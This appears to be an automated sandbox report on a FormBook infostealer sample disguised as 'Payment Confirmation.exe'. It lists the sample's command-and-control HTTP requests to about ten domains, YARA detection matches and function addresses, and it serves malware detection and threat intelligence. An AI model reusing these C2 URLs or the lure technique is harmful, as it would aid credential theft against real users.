          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:33:00 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f93b1-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: Payment Confirmation.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: Payment Confirmation.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.370640534.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: msiexec.exe, 0000000B.00000002.630481531.0000000004B72000.00000004.00020000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: unknownDNS traffic detected: queries for: www.playstarexch.com
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw== HTTP/1.1Host: www.playstarexch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz HTTP/1.1Host: www.anadolu.academyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Tgem/L35NV+dfrLXgk9e0bf+TOX6XAT/DQQ171WvvWAafG5cKA0QEsXJDfpFnN+dx51z362pVQ== HTTP/1.1Host: www.altitudebc.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz HTTP/1.1Host: www.unasolucioendesa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=/Ci6lA1wHDq9VFgkYzq6dZWl1lKVRbc/m6zzwdji+NobEq0OLQXkZXfSz/GKNzBGFBcC52wWgA== HTTP/1.1Host: www.elliotpioneer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=Rsl6eVz8IBrCXPhLu4YLklwV2F0wFlRiIbasvGTIitkrxs2ugDluNYG7ptidipeQIllJsRrQVw==&nZR4=4hr8Pfz HTTP/1.1Host: www.thesewhitevvalls.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ== HTTP/1.1Host: www.lumberjackguitarloops.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw+9AgIy4ohKSIyg89VQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.carts-amazon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ== HTTP/1.1Host: www.chinaopedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /b2c0/?EN9pK2=ESINuQxl50fq+oqp7R8PJEZRcvMrOgZYniX8ZAjuMgliJzJjCEYTKkgZH+GsrKs/YLP3GwXWaQ==&nZR4=4hr8Pfz HTTP/1.1Host: www.atp-cayenne.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Payment Confirmation.exe, 00000001.00000002.366842319.00000000007FA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Payment Confirmation.exe
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: Payment Confirmation.exeStatic file information: Suspicious name
          Source: Payment Confirmation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004047D3
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004061D4
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10008856
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10003D10
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10011101
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1000F922
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100119CC
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100059D1
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001AA08
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1001AA17
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1000B25E
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1000FE94
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10005EC5
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100062DD
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10006712
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10006B47
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_1000F3B0
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041B8B3
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041D1E9
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041C983
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041D247
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041D352
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041CB6E
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041CBE6
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041C3B0
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00408C4B
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00408C90
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_0041CCB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F841F
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A1002
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FB090
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B1D55
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EF900
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E0D20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04504120
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FD5E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04506E30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451EBB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046D1E9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046C983
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046D247
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046D352
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046CB6E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046CBE6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00458C4B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00458C90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046CCB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00452D89
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00452D90
